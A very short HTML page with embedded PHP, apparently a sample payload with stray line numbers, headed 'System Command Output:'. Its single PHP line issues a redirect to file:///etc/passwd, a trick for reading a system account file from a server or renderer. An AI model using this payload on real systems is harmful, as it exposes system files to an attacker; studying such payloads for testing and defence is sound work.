<!DOCTYPE html> 2 <html> 3 <body> <h1>System Command Output:</h1> 5 <?php header('location: file:///etc/passwd'); ?> 8 </body> 9 </html>